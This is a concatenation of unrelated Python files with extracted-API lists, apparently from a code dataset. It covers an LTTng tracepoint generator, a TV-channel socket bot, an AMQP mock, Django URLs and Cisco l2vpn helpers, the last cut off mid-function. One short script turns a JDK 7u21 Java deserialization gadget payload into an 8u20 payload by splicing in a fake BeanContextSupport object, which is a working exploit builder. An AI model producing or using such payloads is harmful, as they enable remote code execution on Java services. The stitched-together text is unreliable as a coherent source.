    Emits one TRACEPOINT_EVENT_CLASS per template (plus an empty-template
    class) and one TRACEPOINT_EVENT_INSTANCE macro per manifest event.

    Args:
        providerName: LTTng provider name used in the tracepoint macros.
        lttngEventHeaderShortName: file name of the generated header, used
            for the TRACEPOINT_INCLUDE definition.
        templates: dict mapping template name -> template object.
        events: iterable of manifest event DOM nodes.

    Returns:
        The complete header file contents as a single string.

    Raises:
        Exception: if an event node has no 'symbol' attribute.
    """
    headerLines = []
    headerLines.append("")
    headerLines.append("#ifdef __int64")
    headerLines.append("#if TARGET_64")
    headerLines.append("#undef __int64")
    headerLines.append("#else")
    headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
    headerLines.append("#endif // TARGET_64")
    headerLines.append("#endif // __int64")
    headerLines.append("#undef TRACEPOINT_PROVIDER")
    headerLines.append("#undef TRACEPOINT_INCLUDE")
    headerLines.append("")
    headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
    headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
    headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
    headerLines.append("#define LTTNG_CHAKRA_H" + providerName + "\n")
    headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
    for templateName in templates:
        template = templates[templateName]
        headerLines.append("")
        headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
        tracepointArgs = generateArgList(template)
        headerLines.append(tracepointArgs)
        headerLines.append("TRACEPOINT_EVENT_CLASS(")
        headerLines.append("    " + providerName + ",")
        headerLines.append("    " + templateName + ",")
        headerLines.append("    " + templateName + "_TRACEPOINT_ARGS,")
        tracepointFields = generateFieldList(template)
        headerLines.append(tracepointFields)
        headerLines.append(")")
        headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
        headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
        headerLines.append("    " + providerName + ",\\")
        headerLines.append("    " + templateName + ",\\")
        headerLines.append("    name,\\")
        headerLines.append("    " + templateName + "_TRACEPOINT_ARGS \\")
        headerLines.append(")")
    # A tracepoint class with no payload, for events that have no template.
    headerLines.append("")
    headerLines.append("")
    headerLines.append("TRACEPOINT_EVENT_CLASS(")
    headerLines.append("    " + providerName + ",")
    headerLines.append("    emptyTemplate,")
    headerLines.append("    TP_ARGS(),")
    headerLines.append("    TP_FIELDS()")
    headerLines.append(")")
    headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
    headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
    headerLines.append("    " + providerName + ",\\")
    headerLines.append("    emptyTemplate,\\")
    headerLines.append("    name,\\")
    headerLines.append("    TP_ARGS()\\")
    headerLines.append(")")
    headerLines.append("")
    for eventNode in events:
        eventName = eventNode.getAttribute('symbol')
        templateName = eventNode.getAttribute('template')
        if not eventName:
            # BUG FIX: eventNode is a DOM node; "node + str" raised TypeError
            # instead of producing the intended diagnostic message.
            raise Exception(str(eventNode) + " event does not have a symbol")
        if not templateName:
            headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
            continue
        headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
    headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
    headerLines.append("#include <lttng/tracepoint-event.h>")
    return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
    """Generate the C++ statements for the FireEtXplat<eventName>() body.

    For templates not flagged by shouldPackTemplate(), arguments are passed
    straight to do_tracepoint(), converting wide-character strings to UTF-8
    first.  Packed templates instead serialize every parameter into a
    growable byte buffer and emit a single (offset, buffer) tracepoint.

    Returns:
        The method body as one string, indented for insertion into the
        generated function.
    """
    # Convert from ETW's windows types to LTTng compatible types
    methodBody = [""]
    functionSignature = template.signature
    if not shouldPackTemplate(template):
        invocation = ["do_tracepoint(" + providerName, eventName]
        for paramName in functionSignature.paramList:
            functionParam = functionSignature.getParam(paramName)
            wintypeName = functionParam.winType
            winCount = functionParam.count
            ctf_type = None
            if functionParam.outType:
                ctf_type = ctfDataTypeMapping.get(functionParam.outType)
            else:
                # BUG FIX: this previously assigned "ctf_Type" (capital T),
                # a dead variable, so the winCount mapping was never applied.
                ctf_type = ctfDataTypeMapping.get(winCount)
            if not ctf_type:
                ctf_type = ctfDataTypeMapping[wintypeName]
            if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
                # Convert wchar unicode string to utf8
                if functionParam.length:
                    methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
                else:
                    methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
                invocation.append(paramName + "_converter")
            # elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer":
            elif wintypeName == "win:Pointer":
                invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
            else:
                invocation.append(paramName)
        methodBody.append(",\n        ".join(invocation) + ");")
    else:
        # Packing results into buffer
        methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
        methodBody.append("char *buffer = stackBuffer;")
        methodBody.append("int offset = 0;")
        methodBody.append("int size = " + str(template.estimatedSize) + ";")
        methodBody.append("bool fixedBuffer = true;")
        methodBody.append("bool success = true;")
        for paramName in functionSignature.paramList:
            functionParameter = functionSignature.getParam(paramName)
            if paramName in template.structCounts:
                size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
                methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
            elif paramName in template.arrayCounts:
                size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
                methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
            elif functionParameter.winType == "win:GUID":
                methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
            else:
                methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
        methodBody.append("if (!success)")
        methodBody.append("{")
        methodBody.append("    if (!fixedBuffer) delete[] buffer;")
        methodBody.append("    return ERROR_WRITE_FAULT;")
        methodBody.append("}")
        methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
        methodBody.append("if (!fixedBuffer) delete[] buffer;")
    return "\n    ".join(methodBody) + "\n"
def generateMethodSignature(template):
    """Build the C++ parameter list for a template's generated functions.

    Returns "" when there is no template.  Otherwise produces one line per
    parameter (struct parameters get an extra int <name>_ElementSize line
    first), joined with ",\\n".
    """
    if not template:
        return ""
    signature = template.signature
    prototype_lines = []
    for param_name in signature.paramList:
        parameter = signature.getParam(param_name)
        win_type = parameter.winType
        pal_type = palDataTypeMapping[win_type]
        pal_count = palDataTypeMapping[parameter.count]
        if param_name in template.structCounts:
            # Struct parameters carry an explicit element-size argument.
            prototype_lines.append("        int " + param_name + "_ElementSize")
        if pal_count != " ":
            type_suffix = pal_count
        elif parameter.length and win_type not in ["win:UnicodeString", "win:AnsiString"]:
            # Counted parameters (other than strings) are passed by pointer.
            type_suffix = "*"
        else:
            type_suffix = ""
        prototype_lines.append("        " + pal_type + type_suffix + " " + parameter.name)
    return ",\n".join(prototype_lines)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
    """Generate the C++ tracepoint-provider source (eventprovider*.cpp).

    Emits the ResizeBuffer/WriteToBuffer helpers plus, for each manifest
    event, an EventXplatEnabled<event>() probe check and a
    FireEtXplat<event>() function whose body comes from generateMethodBody().

    Args:
        providerName: LTTng provider name used in tracepoint macros.
        lttngHeader: file name of the generated tracepoint header to include.
        templates: dict mapping template name -> template object.
        events: iterable of manifest event DOM nodes.

    Returns:
        The complete .cpp file contents as a single string.
    """
    providerLines = [];
    providerLines.append("#define TRACEPOINT_DEFINE")
    providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
    providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
    providerLines.append("#endif")
    providerLines.append("#include \"stdlib.h\"")
    providerLines.append("#include \"Common.h\"")
    providerLines.append("#include \"Codex/Utf8Helper.h\"")
    providerLines.append("#include \"" + lttngHeader + "\"\n\n")
    # Fallbacks so the file still compiles against older lttng-ust releases
    # that do not define tracepoint_enabled/do_tracepoint.
    providerLines.append("#ifndef tracepoint_enabled")
    providerLines.append("#define tracepoint_enabled(provider, name) 1")
    providerLines.append("#define do_tracepoint tracepoint")
    providerLines.append("#endif")
    # Verbatim C++ helper code for the packed-template path: a growable
    # buffer with raw-bytes and typed WriteToBuffer overloads.
    providerLines.append("""
    bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
    {
        newSize *= 1.5;
        _ASSERTE(newSize > size); // Check for overflow
        if (newSize < 32)
        {
            newSize = 32;
        }
        char *newBuffer = new char[newSize];
        memcpy(newBuffer, buffer, currentLength);
        if (!fixedBuffer)
        {
            delete[] buffer;
        }
        buffer = newBuffer;
        size = newSize;
        fixedBuffer = false;
        return true;
    }
    bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
    {
        if (!src)
        {
            return true;
        }
        if (offset + len > size)
        {
            if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
            {
                return false;
            }
        }
        memcpy(buffer + offset, src, len);
        offset += len;
        return true;
    }
    template <typename T>
    bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
    {
        if (sizeof(T) + offset > size)
        {
            if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
            {
                return false;
            }
        }
        *(T *)(buffer + offset) = value;
        offset += sizeof(T);
        return true;
    }
    """)
    for eventNode in events:
        eventName = eventNode.getAttribute('symbol')
        templateName = eventNode.getAttribute('template')
        # Probe check exported with C linkage so the PAL shim can call it.
        providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
            % (eventName, providerName, eventName))
        providerLines.append("")
        template = None
        if templateName:
            template = templates[templateName]
        providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
        providerLines.append(generateMethodSignature(template))
        providerLines.append(")")
        providerLines.append("{")
        # Skip the tracepoint entirely when the probe is disabled.
        providerLines.append("    if (!EventXplatEnabled" + eventName + "())")
        providerLines.append("        return ERROR_SUCCESS;")
        if template:
            providerLines.append(generateMethodBody(template, providerName, eventName))
        else:
            # No payload: fire the empty-template tracepoint directly.
            providerLines.append("    do_tracepoint(" + providerName + ", " + eventName +");")
        providerLines.append("")
        providerLines.append("    return ERROR_SUCCESS;")
        providerLines.append("}")
        providerLines.append("")
    return "\n".join(providerLines)
def generateEtwHeader(templates, events):
    """Generate the ETW-compatibility header (<provider>Etw.h).

    For every event, declares the FireEtXplat* / EventXplatEnabled*
    functions and wraps them in inline EventWrite* / EventEnabled*
    functions matching the names ETW callers expect.

    Args:
        templates: dict mapping template name -> template object.
        events: iterable of manifest event DOM nodes.

    Returns:
        The complete header contents as a single string.
    """
    headerLines = []
    headerLines.append("#include \"pal.h\"")
    headerLines.append("")
    for event in events:
        eventName = event.getAttribute('symbol')
        templateName = event.getAttribute('template')
        template = None
        if templateName:
            template = templates[templateName]
        callArgs = []
        if template:
            functionSignature = template.signature
            for param in functionSignature.paramList:
                if param in template.structCounts:
                    # Struct parameters are forwarded with their extra
                    # element-size argument first.
                    callArgs.append(param + "_ElementSize")
                callArgs.append(param)
        headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
        headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
        headerLines.append("")
        headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
        headerLines.append(generateMethodSignature(template))
        headerLines.append(");")
        headerLines.append("inline unsigned long EventWrite" + eventName + "(")
        headerLines.append(generateMethodSignature(template))
        headerLines.append(")")
        headerLines.append("{")
        headerLines.append("    return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
        headerLines.append("}")
        headerLines.append("")
    return "\n".join(headerLines)
def generateCmakeFile(providerName):
    """Produce the CMakeLists.txt contents for the Chakra.LTTng object library.

    Args:
        providerName: lower-cased provider name embedded in the generated
            source file names.

    Returns:
        The CMake file contents as one newline-joined string.
    """
    source_lines = [
        "project(Chakra.LTTng)",
        "",
        "add_compile_options(-fPIC)",
        "",
        "add_library (Chakra.LTTng OBJECT",
        "  eventprovider" + providerName + ".cpp",
        "  tracepointprovider" + providerName + ".cpp",
        ")",
    ]
    return "\n".join(source_lines)
def generateLttngFiles(manifest, providerDirectory):
    """Parse the ETW manifest and write all generated LTTng sources.

    For each <provider> in the manifest, writes under
    <providerDirectory>/lttng: the tracepoint header, the tracepoint
    provider .cpp, the event provider .cpp, the ETW-compat header, and a
    CMakeLists.txt.

    Args:
        manifest: path to the ETW manifest XML file.
        providerDirectory: output directory (created if missing).
    """
    import os
    tree = DOM.parse(manifest)
    if not os.path.exists(providerDirectory):
        os.makedirs(providerDirectory)
    if not os.path.exists(providerDirectory + "/lttng"):
        os.makedirs(providerDirectory + "/lttng")
    for providerNode in tree.getElementsByTagName("provider"):
        # Strip the vendor prefix; file names use the lower-cased remainder.
        providerName = providerNode.getAttribute("name")
        providerName = providerName.replace("Microsoft-", "")
        providerNameFile = providerName.lower()
        lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
        lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
        lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
        lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
        lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
        lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
        lttngHeader = open(lttngEventHeaderPath, "w")
        lttngImplementation = open(lttngEventProvider, "w")
        lttngTraceImplementation = open(lttngEventProviderTrace, "w")
        lttngEtwHeader = open(lttngEtwHeaderFile, "w")
        lttngCmake = open(lttngCmakeFile, "w")
        # Create the lttng implementation
        lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
        lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")
        lttngTraceImplementation.close()
        # Create the lttng header
        templateNodes = providerNode.getElementsByTagName('template')
        eventNodes = providerNode.getElementsByTagName('event')
        allTemplates = parseTemplateNodes(templateNodes)
        lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        lttngHeader.close();
        lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        lttngImplementation.close();
        lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
        lttngEtwHeader.close()
        # Note: This in particular assumes that there is only one ETW provider
        # (CMakeLists.txt is rewritten on every loop iteration).
        lttngCmake.write(generateCmakeFile(providerNameFile))
        lttngCmake.close()
if __name__ == '__main__':
    import argparse
    import sys
    # Command-line entry point: --man is the ETW manifest XML and
    # --intermediate the output directory for the generated LTTng sources.
    parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")
    required = parser.add_argument_group('required arguments')
    required.add_argument('--man',  type=str, required=True,
                                    help='full path to manifest containig the description of events')
    required.add_argument('--intermediate', type=str, required=True,
                                    help='full path to eventprovider  intermediate directory')
    args, unknown = parser.parse_known_args(sys.argv[1:])
    # Reject stray arguments explicitly rather than silently ignoring them.
    if unknown:
        print('Unknown argument(s): ', ', '.join(unknown))
        sys.exit(1)
    generateLttngFiles(args.man, args.intermediate)
    sys.exit(0)
| [
"os.path.exists",
"xml.dom.minidom.parse",
"os.makedirs",
"argparse.ArgumentParser",
"sys.exit"
] | [((26281, 26300), 'xml.dom.minidom.parse', 'DOM.parse', (['manifest'], {}), '(manifest)\n', (26290, 26300), True, 'import xml.dom.minidom as DOM\n'), ((28758, 28868), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generates the Code required to instrument LTTtng logging mechanism"""'}), "(description=\n 'Generates the Code required to instrument LTTtng logging mechanism')\n", (28781, 28868), False, 'import argparse\n'), ((29464, 29475), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (29472, 29475), False, 'import sys\n'), ((26313, 26346), 'os.path.exists', 'os.path.exists', (['providerDirectory'], {}), '(providerDirectory)\n', (26327, 26346), False, 'import os\n'), ((26356, 26386), 'os.makedirs', 'os.makedirs', (['providerDirectory'], {}), '(providerDirectory)\n', (26367, 26386), False, 'import os\n'), ((26399, 26443), 'os.path.exists', 'os.path.exists', (["(providerDirectory + '/lttng')"], {}), "(providerDirectory + '/lttng')\n", (26413, 26443), False, 'import os\n'), ((26453, 26494), 'os.makedirs', 'os.makedirs', (["(providerDirectory + '/lttng')"], {}), "(providerDirectory + '/lttng')\n", (26464, 26494), False, 'import os\n'), ((29395, 29406), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (29403, 29406), False, 'import sys\n')] |
"""
Handles all requests that come from the phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
    """
    Handles the tcp socket connection
    """

    # Ordered (keywords, channel) table; the first entry whose keyword
    # appears in the upper-cased request wins, mirroring the original
    # if/elif chain exactly.
    _CHANNEL_TABLE = (
        (("STAR",), bot.TV_STAR),
        (("ATV",), bot.TV_ATV),
        (("KANAL D", "KANALD"), bot.TV_KANALD),
        (("TRT",), bot.TV_TRT),
        (("FOX",), bot.TV_FOX),
        (("SHOW TV", "SHOW"), bot.TV_SHOW),
        (("TV2", "TV 2"), bot.TV_TV2),
    )

    def handle(self):
        self.bot = TVBot()
        while True:
            self.data = self.rfile.readline()
            if not self.data:
                # Peer closed the connection.
                break
            self.data = self.data.decode()
            command = self.data.upper()
            for keywords, channel in self._CHANNEL_TABLE:
                if any(word in command for word in keywords):
                    self.bot.open(channel)
                    break
            else:
                if "KAPAT" in command or "CLOSE" in command:
                    self.bot.close()
        self.bot.close()
| [
"bot.TVBot"
] | [((268, 275), 'bot.TVBot', 'TVBot', ([], {}), '()\n', (273, 275), False, 'from bot import TVBot\n')] |
import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
    # Rewrites a JDK 7u21 gadget-chain payload into an 8u20 variant by
    # splicing a fake BeanContextSupport object into the serialized stream.
    with open("../files/7u21.ser", "rb") as f:
        a = ObjectRead(f)
        obj = a.readContent()
    # Step 1: add a fake field named "fake" to the HashSet's class description.
    signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
    fakeSignature = {'name': 'fake', 'signature': signature}
    obj.javaClass.superJavaClass.fields.append(fakeSignature)
    # Build the fake BeanContextSupport serialized object; note that it must
    # reference the AnnotationInvocationHandler that appears later on.
    # Load the class description of BeanContextSupportClass.
    with open('BeanContextSupportClass.yaml', 'r') as f1:
        BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
    # Add the beanContextChildPeer field to beanContextSupportObject.
    beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
    beanContextChildPeerField = JavaField('beanContextChildPeer',
                                          JavaString('Ljava/beans/beancontext/BeanContextChild'),
                                          beanContextSupportObject)
    beanContextSupportObject.fields.append([beanContextChildPeerField])
    # Add the serializable field to beanContextSupportObject.
    serializableField = JavaField('serializable', 'I', 1)
    beanContextSupportObject.fields.append([serializableField])
    # Add objectAnnotation data to beanContextSupportObject.
    beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
    AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
    beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
    # Put the beanContextSupportObject into the fake field.
    fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
    obj.fields[0].append(fakeField)
    with open("8u20.ser", 'wb') as f:
        o = ObjectWrite(f)
        o.writeContent(obj)
| [
"javaSerializationTools.JavaEndBlock",
"javaSerializationTools.JavaString",
"javaSerializationTools.ObjectRead",
"javaSerializationTools.JavaObject",
"javaSerializationTools.JavaField",
"javaSerializationTools.ObjectWrite"
] | [((277, 290), 'javaSerializationTools.ObjectRead', 'ObjectRead', (['f'], {}), '(f)\n', (287, 290), False, 'from javaSerializationTools import ObjectRead\n'), ((379, 436), 'javaSerializationTools.JavaString', 'JavaString', (['"""Ljava/beans/beancontext/BeanContextSupport;"""'], {}), "('Ljava/beans/beancontext/BeanContextSupport;')\n", (389, 436), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((929, 968), 'javaSerializationTools.JavaObject', 'JavaObject', (['BeanContextSupportClassDesc'], {}), '(BeanContextSupportClassDesc)\n', (939, 968), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1370, 1403), 'javaSerializationTools.JavaField', 'JavaField', (['"""serializable"""', '"""I"""', '(1)'], {}), "('serializable', 'I', 1)\n", (1379, 1403), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1841, 1912), 'javaSerializationTools.JavaField', 'JavaField', (['"""fake"""', "fakeSignature['signature']", 'beanContextSupportObject'], {}), "('fake', fakeSignature['signature'], beanContextSupportObject)\n", (1850, 1912), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((2005, 2019), 'javaSerializationTools.ObjectWrite', 'ObjectWrite', (['f'], {}), '(f)\n', (2016, 2019), False, 'from javaSerializationTools import ObjectWrite\n'), ((1085, 1139), 'javaSerializationTools.JavaString', 'JavaString', (['"""Ljava/beans/beancontext/BeanContextChild"""'], {}), "('Ljava/beans/beancontext/BeanContextChild')\n", (1095, 1139), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n'), ((1589, 1603), 'javaSerializationTools.JavaEndBlock', 'JavaEndBlock', ([], {}), '()\n', (1601, 1603), False, 'from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock\n')] |
import asyncio
import uuid
class MockChannel:
    """AMQP channel stub that records every call instead of sending it."""

    def __init__(self):
        self.published = []
        self.acked = []
        self.nacked = []

    @staticmethod
    def _record(call_log, args, kwargs):
        # Keep both positional and keyword arguments for later inspection.
        call_log.append({"args": args, "kwargs": kwargs})

    async def publish(self, *args, **kwargs):
        self._record(self.published, args, kwargs)

    async def basic_client_ack(self, *args, **kwargs):
        self._record(self.acked, args, kwargs)

    async def basic_client_nack(self, *args, **kwargs):
        self._record(self.nacked, args, kwargs)
class MockEnvelope:
    """Minimal envelope stand-in carrying only the delivery tag."""
    def __init__(self, uid):
        # delivery_tag is what basic_client_ack/nack match against.
        self.delivery_tag = uid
class MockAMQPChannel:
    """In-memory mock of an aioamqp channel.

    Messages flow through the owning MockAMQPProtocol's ``queues`` dict;
    consumers poll those queues on a background task.  Nacked messages are
    either requeued or moved to the dead-letter queue recorded in the
    protocol's ``dead_mapping``.
    """
    def __init__(self, protocol):
        self.protocol = protocol
        self.consumers = []
        self.closed = False
        self.unacked_messages = []
    async def basic_qos(self, *args, **kwargs):
        # QoS settings are irrelevant for the mock; accept and ignore.
        pass
    async def exchange_declare(self, *args, **kwargs):
        pass
    async def queue_declare(self, queue_name, *args, **kwargs):
        """Create the queue and record any dead-letter routing key."""
        if queue_name not in self.protocol.queues:
            self.protocol.queues[queue_name] = []
        if "arguments" in kwargs:
            arguments = kwargs["arguments"]
            if "x-dead-letter-routing-key" in arguments:
                self.protocol.dead_mapping[queue_name] = arguments[
                    "x-dead-letter-routing-key"
                ]
    async def queue_bind(self, *args, **kwargs):
        pass
    async def _basic_consume(self, handler, queue_name):
        # Polling loop: drain the queue every 20ms and hand each message to
        # the consumer callback until the channel is closed.
        while not self.closed:
            await asyncio.sleep(0.02)
            if queue_name not in self.protocol.queues:
                continue
            else:
                messages = self.protocol.queues[queue_name]
                self.protocol.queues[queue_name] = []
                # Messages stay un-acked until the handler acks/nacks them.
                self.unacked_messages.extend(messages)
                for message in messages:
                    await handler(
                        self,
                        message["message"],
                        MockEnvelope(message["id"]),
                        message["properties"],
                    )
    async def basic_client_ack(self, delivery_tag):
        """Drop the matching un-acked message and return it (None if absent)."""
        for message in self.unacked_messages[:]:
            if delivery_tag == message["id"]:
                self.unacked_messages.remove(message)
                return message
    async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
        # NOTE(review): ``multiple`` is accepted for API parity but ignored.
        message = await self.basic_client_ack(delivery_tag)
        if message:
            if requeue:
                # put back on same queue
                self.protocol.queues[message["queue"]].append(message)
            else:
                # Route to the dead-letter queue declared for this queue.
                new_queue = self.protocol.dead_mapping[message["queue"]]
                self.protocol.queues[new_queue].append(message)
    async def basic_consume(self, handler, queue_name):
        # Start the background polling task for this consumer.
        self.consumers.append(
            asyncio.ensure_future(self._basic_consume(handler, queue_name))
        )
    async def publish(
        self, message, exchange_name=None, routing_key=None, properties={}
    ):
        # NOTE(review): ``properties={}`` is a shared mutable default; safe
        # only as long as callers never mutate the stored dict.
        if routing_key not in self.protocol.queues:
            self.protocol.queues[routing_key] = []
        self.protocol.queues[routing_key].append(
            {
                "id": str(uuid.uuid4()),
                "message": message,
                "properties": properties,
                "queue": routing_key,
            }
        )
    async def close(self):
        self.closed = True
        # Give the 20ms polling loops time to observe ``closed`` and exit.
        await asyncio.sleep(0.06)
await asyncio.sleep(0.06)
class MockAMQPTransport:
    """Transport stub: nothing to set up, nothing to tear down."""
    def __init__(self):
        pass
    def close(self):
        pass
class MockAMQPProtocol:
    """Protocol stub owning the shared queues and the channels it hands out."""

    def __init__(self):
        self.queues = {}
        self.dead_mapping = {}
        self.closed = False
        self.channels = []

    async def channel(self):
        """Create, register and return a new mock channel."""
        new_channel = MockAMQPChannel(self)
        self.channels.append(new_channel)
        return new_channel

    async def wait_closed(self):
        # Poll until close() flips the flag, then bail out the same way the
        # original did: by raising GeneratorExit.
        while not self.closed:
            await asyncio.sleep(0.05)
        raise GeneratorExit()

    async def close(self):
        self.closed = True
        for open_channel in self.channels:
            await open_channel.close()

    async def send_heartbeat(self):
        # Heartbeats are meaningless for the in-memory mock.
        pass
async def amqp_connection_factory(*args, **kwargs):
    """Drop-in mock for an aioamqp connect call.

    Ignores every argument and returns a fresh
    (MockAMQPTransport, MockAMQPProtocol) pair.
    """
    transport = MockAMQPTransport()
    protocol = MockAMQPProtocol()
    return transport, protocol
| [
"uuid.uuid4",
"asyncio.sleep"
] | [((3441, 3460), 'asyncio.sleep', 'asyncio.sleep', (['(0.06)'], {}), '(0.06)\n', (3454, 3460), False, 'import asyncio\n'), ((1496, 1515), 'asyncio.sleep', 'asyncio.sleep', (['(0.02)'], {}), '(0.02)\n', (1509, 1515), False, 'import asyncio\n'), ((3935, 3954), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (3948, 3954), False, 'import asyncio\n'), ((3217, 3229), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3227, 3229), False, 'import uuid\n')] |
from django.conf.urls import url
from . import views
# URL routing table: each prefix maps to its webhook view.
urlpatterns = [
    # Bot webhook endpoint handled by views.webhook.
    url(r'^bot/', views.webhook, name='bot'),
    # Food-center webhook endpoint.
    url(r'^foodcenter/', views.food_center_webhook, name= 'food'),
    # url(r'^relay/', vi)
]
"django.conf.urls.url"
] | [((74, 113), 'django.conf.urls.url', 'url', (['"""^bot/"""', 'views.webhook'], {'name': '"""bot"""'}), "('^bot/', views.webhook, name='bot')\n", (77, 113), False, 'from django.conf.urls import url\n'), ((120, 179), 'django.conf.urls.url', 'url', (['"""^foodcenter/"""', 'views.food_center_webhook'], {'name': '"""food"""'}), "('^foodcenter/', views.food_center_webhook, name='food')\n", (123, 179), False, 'from django.conf.urls import url\n')] |
"""Common configure functions for bgp"""
# Python
import logging
import re
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_l2vpn_storm_control(
    device, interface, service_instance_id, storm_control
):
    """ Configures storm control under service instance
        Args:
            device('obj'): device to configure
            interface('str'): interface name
            service_instance_id:('int'): service instance id
            storm_control('list'): list of storm control configurations,
                each a dict with keys 'traffic_flow', 'name' and 'val'
        Returns:
            N/A
        Raises:
            SubCommandFailure
    """
    log.info(
        "Configuring storm control under service "
        "instance: {} and interface: {}".format(service_instance_id, interface)
    )
    # Build the CLI payload: interface + service-instance header followed by
    # one storm-control line per requested traffic flow.
    cfg_lines = [
        "interface {}\n".format(interface),
        "service instance {} ethernet\n".format(service_instance_id),
    ]
    cfg_lines.extend(
        "storm-control {} {} {}\n".format(
            entry["traffic_flow"], entry["name"], entry["val"]
        )
        for entry in storm_control
    )
    try:
        device.configure("".join(cfg_lines))
    except SubCommandFailure as e:
        raise SubCommandFailure(
            "Configuration failed for storm control under service "
            "instance: {} and interface: {} with exception: {}".format(
                service_instance_id, interface, str(e)
            )
        )
def configure_l2vpn_vfi_context_vpls(device, vpn_id, pseudowire=None):
    """
    Configures l2vpn vfi context vpls on device
    Args:
        device('obj'): device to configure
        vpn_id('str'): vpn_id to configure
        pseudowire('str', optional): pseudowire members to configure,
            default value is None
    Returns:
        N/A
    Raises:
        SubCommandFailure
    """
    log.info(
        "Configuring l2vpn vfi context vpls on {dev}".format(dev=device.name)
    )
    cmd_list = [
        "l2vpn vfi context vpls",
        "vpn id {vpn}".format(vpn=vpn_id),
    ]
    # One member line per pseudowire entry (skipped when None/empty).
    for member in pseudowire or []:
